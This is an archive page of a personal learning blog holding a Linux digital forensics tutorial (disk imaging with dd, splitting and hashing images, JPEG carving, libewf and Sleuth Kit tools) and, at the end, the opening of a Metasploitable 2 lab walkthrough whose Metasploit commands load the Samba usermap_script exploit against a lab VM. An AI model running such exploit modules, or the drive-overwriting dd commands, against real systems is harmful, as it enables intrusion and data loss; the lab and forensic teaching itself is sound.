Learning Until Die: Februari 2014

Selasa, 18 Februari 2014

Digital Forensic: Acquire Large Capacity Disk

Split Large Capacity Disk

list device from yaour laptop or compter
root@bt:~/evid# fdisk -l

root@bt:~/evid# fdisk -l
WARNING: GPT (GUID Partition Table) detected on '/dev/sda'! The util fdisk doesn't support GPT. Use GNU Parted.

Disk /dev/sda: 500.1 GB, 500107862016 bytes

255 heads, 63 sectors/track, 60801 cylinders
Units = cylinders of 16065 * 512 = 8225280 bytes
Sector size (logical/physical): 512 bytes / 4096 bytes
I/O size (minimum/optimal): 4096 bytes / 4096 bytes
Disk identifier: 0xb05cd80c
Device Boot      Start         End      Blocks   Id System
/dev/sda1   *           1          13      102400    7 HPFS/NTFS
Partition 1 does not end on cylinder boundary.
/dev/sda2              13       12749   102297600    7 HPFS/NTFS
/dev/sda3           12749       18828    48828125   83 Linux
/dev/sda4           18828       60801   337154049    f W95 Ext'd (LBA)
Partition 4 does not start on physical sector boundary.
/dev/sda5           18828       19077     1999872   82 Linux swap / Solaris
/dev/sda6           19077       60801   335153152    7 HPFS/NTFS

Disk /dev/sdc: 7803 MB, 7803174912 bytes
241 heads, 62 sectors/track, 1019 cylinders
Units = cylinders of 14942 * 512 = 7650304 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes
Disk identifier: 0x00044125

get informatin device de/sdc is 8Gb space , we will DD /dev/sdc to create image file we clone Flasdisk

root@bt:~/evid# dd if=/dev/sdc of=image.disk2.dd

use ls to see file and folder in evid folder,

split normally works on lines of input (i.e. from a text file). But if we use the –b option, we force split to treat the file as binary input and lines are ignored.
In newer versions of split we can also use the -d option to give us numerical numbering (*.01, *.02, *.03, etc.)

split -d -b XXm <file to be split> <prefix of output files>

split image.disk2.dd

root@bt:~/evid# split -d -b 2000m image.disk2.dd image.split2.

This would result in 2 files (8GB in size) each named with the prefix “image.split.” as specified in the command, followed by “01”, “02” and so
on (assuming a newer version of split that supports the -d option is used):

root@bt:~/evid# ls image.split2.*

The process can be reversed. If we want to reassemble the image from
the split parts (from CD-R, etc.), we can use the cat command and redirect the
output to a new file.

root@bt:~/evid# cat image.split2.00 image.split2.01 > image2.new
OR

root@bt:~/evid# cat image.split2.0* > image2.new

look hasing

root@bt:~/evid# cat image.split2.0* | md5sum
root@bt:~/evid# md5sum image2.new

Looking at the output of the above commands, we see that all the sha1sum’s match (don't confuse sha1sum output with md5sum output). We find the same hash for the disk, for the split images “cat-ed” together, and for the newly reassembled image.

Data carving using DD

http://www.LinuxLEO.com/Files/image_carve.raw

download and copy to /evid

Have a brief look at the file image_carve.raw with your wonderful command line hexdump tool, xxd:

root@bt:~/evid# xxd image_carve.raw | less

Find the start of the JPEG (xxd and grep)

root@bt:~/evid# xxd image_carve.raw | grep ffd8

00052a0: b4f1 559c ffd8 ffe0 0010 4a46 4946 0001 ..U.......JFIF..

Now we can calculate the byte offset in decimal

root@bt:~/evid# echo "ibase=16;00052A0" | bc

21152

So we add 4 to the start of the line. Our offset is now 21156

Now it’s time to find the end of the file.

root@bt:~/evid# xxd -s 21156 image_carve.raw | grep ffd9

0006c74: ffd9 d175 650b ce68 4543 0bf5 6705 a73c ...ue..hEC..g..<

calculate decimal

root@bt:~/evid# echo "ibase=16;0006C74" | bc

27764

Now that we know the start and the end of the file, we can calculate the size:

nclude the ffd9 (giving us 27766)

root@bt:~/evid# echo "27766 - 21156" | bc

6610

We now know the file is 6610 bytes in size, and it starts at byte offset 21156. The carving is the easy part! We will use dd with three options: skip= how far into the data chuck we begin “cutting”. bs= (block size) the number of bytes we include as a “block”. count = the number of blocks we will be “cutting”.

root@bt:~/evid# dd if=image_carve.raw of=carv.jpg skip=21156 bs=1 count=6610

6610+0 records in

6610+0 records out

6610 bytes (6.6 kB) copied, 0.0285196 s, 232 kB/s

our current directory called carv.jpg. If you are in X, simply use the xv command to view the file

xv from a command line (while in an X session) will display the graphic image in it's own window.

LIBEWF - Working with Expert Witness Files

The libewf tools and detailed project information can be found at:
https://www.uitwisselplatform.nl/projects/libewf/

We will cover the following tools briefly here:

ewfinfo

ewfverify

ewfexport

ewfacquire

ewfacquirestream

ewfinfo

root@bt:~/evid# ewfinfo ntfs_pract.E01

ewfverify

root@bt:~/evid# ewfverify ntfs_pract.E01

ewfexport

root@bt:~/evid# ewfexport ntfs_pract.E01 | md5sum

root@bt:~/evid# ewfexport -t ntfs_image.dd ntfs_pract.E01

root@bt:~/evid# md5sum ntfs_image.dd

d3c4659e4195c6df1da3afdbdc0dce8f ntfs_image.dd

ewfacquire

root@bt:~/evid# ewfacquire /dev/sdc

Acquiry parameters required, please provide the necessary input

Image path and filename without extension: /root/ntfs_ewf

Case number: 111-222

Description: Removable media (generic thumdrive)

Evidence number: 1

Examiner name: Umar Alfaruq

Notes: Seized from subject

Media type (fixed, removable, optical, memory) [removable]: removable disk

Selected option not supported, please try again or terminate using Ctrl^C.

Media type (fixed, removable, optical, memory) [removable]: removable

Media characteristics (logical, physical) [logical]: physical

Use compression (none, empty-block, fast, best) [none]: fast

Use EWF file format (ewf, smart, ftk, encase1, encase2, encase3, encase4, encase5, encase6, linen5, linen6, ewfx) [encase6]: encase5

Start to acquire at offset (0 >= value >= 4040748544) [0]:

The amount of bytes to acquire (0 >= value >= 4040748544) [4040748544]:

Evidence segment file size in bytes (1.0 MiB >= value >= 1.9 GiB) [1.4 GiB]:

The amount of bytes per sector (0 >= value >= 4294967295) [512]:

The amount of sectors to read at once (64, 128, 256, 512, 1024, 2048, 4096, 8192, 16384, 32768) [64]:

The amount of sectors to be used as error granularity (1 >= value >= 64) [64]:

The amount of retries when a read error occurs (0 >= value >= 255) [2]:

Wipe sectors on read error (mimic EnCase like behavior) (yes, no) [no]: yes

Senin, 17 Februari 2014

Basic Command Computer Forensic

Tools to forensic data

1. dd,
resource : http://www.forensicswiki.org/wiki/Dd

Forensic tools to analysis data image format, keep data no change propertis like time and other

Usage: dd [OPERAND]...
or: dd OPTION

The basic dd syntax is as follows:

# dd if= of= bs=

("if" being "input file" and "of" meaning "output file").

wiped and formatted drive, like this:

# dd if=/dev/ of=/dev/ bs=512 conv=noerror,sync

You can write the output to a file:

# dd if=/dev/ of=/home/user/linux_image.dd bs=512 conv=noerror,sync

root@bt:~/evid# dd if=/dev/fd0 of=image.disk1 bs=512
In linux, the blocksize value can have a multiplicative suffix:

c =1
w =2
b =512
kB =1000,           K =1024
MB =1000*1000,      M =1024*1024
GB =1000*1000*1000, G =1024*1024*1024
and so on for T, P, E, Z, Y.

2. libewf
resource : http://code.google.com/p/libewf/wiki/Mounting

libewf is a library to access the Expert Witness Compression Format (EWF).

- mkdir /mnt/ewfimage
- mounting

ewfmount image.E01 /mnt/ewfimage/

This will create the following device file:

/mnt/ewfimage/ewf1

Unmount :

umount /mnt/ewfimage/

Or fusermount:

fusermount -u /mnt/ewfimage/

3. sleuthkit
resource : http://www.sleuthkit.org/
A library, framework, and set of command line tools to analyze disk images.

- Its comand line forensic tools can be used to analyze disk images and perform in-depth analysis of file systems (such as NTFS, FAT, HFS+, Ext3, and UFS) and several volume system types. for graphical interface can use Autopsy

root@bt:~# icat -h
Missing image name and/or address
usage: icat [-hrRsvV] [-f fstype] [-i imgtype] [-b dev_sector_size] [-o imgoffset] image [images] inum[-typ[-id]]
        -h: Do not display holes in sparse files
        -r: Recover deleted file
        -R: Recover deleted file and suppress recovery errors
        -s: Display slack space at end of file
        -i imgtype: The format of the image file (use '-i list' for supported types)
        -b dev_sector_size: The size (in bytes) of the device sectors
        -f fstype: File system type (use '-f list' for supported types)
        -o imgoffset: The offset of the file system in the image (in sectors)
        -v: verbose to stderr
        -V: Print version

http://wiki.sleuthkit.org/index.php?title=TSK_Tool_Overview
http://wiki.sleuthkit.org/index.php?title=FS_Analysis

4. Autopsy
A graphical interface to the Sleuth Kit and other digital forensics tools.

Introduction to Computer / Digital Forensic : practical_floppy.dd

To cunduct Computer Forensic any 5 fase / procedure.
1. Identification
2. Preservation to preserve evidence, chain of chustady fisic and labelling exhibit
3. Examination /Colleccting
4. Analysis (chain of chustady, analisis, Colecting, Recontruction)
5. Presentation report and conclusion.

There are two types of data :
1. Volatile : data is loss when computer is off. ex : data on RAM
2. Non Volatile : data is not loss when computer is off. ex :data on HDD,FDD, etc

Tools to Digital Forensic
on Linux :

TSK (sleuthkit),
EwfLib,
Aff,
dd, to clone Divice
Volatility, to Analisis memory RAM
Ptk, cal
Explico, to Network Forensic
etc

on Windows: Encase, FTK

Practice for example..
resouces : The Law Enforcement and Forensic Examiner's Introduction to Linux

1. Analysis organization
analisis forensic practical_floppy.dd

The practice floppy (in raw image format from a simple dd) for the following exercise is available at:

http://www.LinuxLEO.com/Files/practical.floppy.dd

Once you download the floppy image, lets to analyze
- Create /dev/fd0 using touch couse on Backtrack not yet
-

-
- create a directory in your “home” directory for evidence and then a subdirectory for different cases

The tilde (~) in front of the directory name is shorthand for “home directory”, Note that if you are already in your home directory, then you don't need to type ~/. Simply using mkdir evid will work just fine. o the output files that we create and the images we make will be found under /root/evid/.

- create a special mount point for all subject file system analysis

root@bt:~# mkdir /mnt/analysis

Determining the structure of disk

The first, fdisk, we discussed earlier using the -l option. Replace the “x” with the letter of the drive that corresponds to the subject drive. For example, if our subject disk is attached on the secondary IDE channel as the master disk, it will be seen as /dev/hdc. A Serial ATA (SATA) disk will be /dev/sda (or sdb, etc.) We can get the partition information on that disk with:

chek fdisk -l

get information a serial SATA..~#fdisk -l /dev/sda

We can redirect the output of this command to a file for later use by
issuing the command as:

root@bt:~# fdisk -l /dev/sb1 > ~/evid/fdisk.disk1

Creating a forensic image of the suspect disk

- Make an image of the practice disk using basic dd, and change directory to evid

root@bt:~/evid# dd if=/dev/fd0 of=image.disk1 bs=512

/dev/fd0 : take flopy device
if : input file

of=image.disk1 : out file called image.disk1 in directory /dev/fd0

bs=512 : specific block size 512

- For the sake of safety and practice, change the read-write permissions of
your image to read-only

can give 400 to real picky

Mounting a restored image

root@bt:~/evid# mount -t vfat -o ro,noexec /dev/fd0 /mnt/analysis/ -o loop

specifies the options
ro :read-only
noexec : prevents the execution of binaries from the mount point

be sure unmount if finish

root@bt:~/evid# umount /mnt/analysis/

File Hash

can use SHA or MD5 Hash

root@bt:~/evid# md5sum /dev/fd0

hasing /dev/fdo and return to file md5.disk1 by type this:
root@bt:~/evid# md5sum /dev/fd0 > md5.disk1

- We can get a hash of each file on the disk using the find command and an option that allows us to execute a command on each file found

- mounting image
root@bt:~/evid# mount -t vfat -o ro,noexec,noatime,loop image.disk1/mnt/analysis
root@bt:~/evid# cd /mnt/analysis

-t :
ro : read only
noexec : prevents the execution of binaries from the mountpoint
noatime : time
loop :

- Once we are in the /mnt/analysis directory we can now run a command that will find all the regular files on the file system at that mount point and run a hash on all those files:

root@bt:/mnt/analysis# find . -type f -exec md5sum {} \; > ~/evid/md5.filelist
find : comand
"." : signifed
-type f : any reguler type file
-exec : execute
md5sum {} : to hasing md5 all files found
> : redirect to
md5.filelist : name file to output
~/evd/ : directory where we all storing all our evidence files

- Have a look at the hashes by using the cat command to stream the file to
standard output
root@bt:/mnt/analysis# cat /root/evid/md5.filelist

- To verify that nothing has been changed on the original floppy, you can use the -c option

root@bt:/mnt/analysis# md5sum -c /root/evid/md5.disk1

root@bt:/mnt/analysis# md5sum -c /root/evid/md5.filelist

The Analysis

- mount /mnt/analysis
- use ls -all
root@bt:/mnt/analysis# ls -al

This will show all the hidden files (-a), give the list in long format to
identify permission, date, etc. (-l). You can also use the –R option to list
recursively through directories. You might want to pipe that through less.

root@bt:/mnt/analysis# ls -alR | less

Making a List of All Files

- For example,you could use the –i option to include the inode (file “serial number”) in the list, the –u option can be used so that the output will include and sort by access time (when used with the –t option).

root@bt:/mnt/analysis# ls -aliRtu > ~/evid/access_file.list

- using the find command and redirecting the output to another list file:

root@bt:/mnt/analysis# find . -type f > ~/evid/file.list.2

- There is also the tree command,

Now use the grep command on either of lists created by the first two
commands above for whatever strings or extensions you want to look for.

i : case insensitive

jpg : grep file JPG

Making a List of File Types

file filename

root@bt:/mnt/analysis# find . -type f -exec file {} \; > ~/evid/filetype.list

root@bt:/mnt/analysis# cat ~/evid/filetype.list

root@bt:/mnt/analysis# grep image ~/evid/filetype.list

Viewing Files

For text files and data files, you might want to use cat, more or less to
view the contents.

cat filename
more filename
less filename

Perhaps a better alternative for viewing unknown files would be to use
the strings command.

strings filename | less

root@bt:/mnt/analysis# ls
ARP.EXE Docs FTP.EXE loveletter.virus ouchy.dat Pics snoof.gz

root@bt:/mnt/analysis# strings arp.exe | less

this screenshot not full..
Once you are finished exploring, be sure to unmount the floppy

Searching Unallocated and Slack Space for Text

Now let’s go back to the original image.
First, change back to the directory in which you created the image, whether it was the root’s home directory, or a special one you created.

root@bt:~# cd evid/
root@bt:~/evid#

use the grep command to search the image for any instance of an expression or pattern.

grep –options <pattern> <file-to-search>

root@bt:~/evid# nano searchlist.txt

root@bt:~/evid# grep -abif searchlist.txt image.disk1 > hits.txt
root@bt:~/evid# cat hits.txt

root@bt:~/evid# xxd -s 75441 image.disk1 | lees

Rabu, 05 Februari 2014

Metasploitable 2 Exploitability

install metasploitable on Virtuabox and start

and looks like tihis

Scan using nmap, zenmap and nessus

1. Samba

Let’s search for a Samba exploit and try it against the system:

msf auxiliary(tikidblib) > use exploit/multi/samba/usermap_script
msf exploit(usermap_script) > show options
msf exploit(usermap_script) > set RHOST 192.168.56.101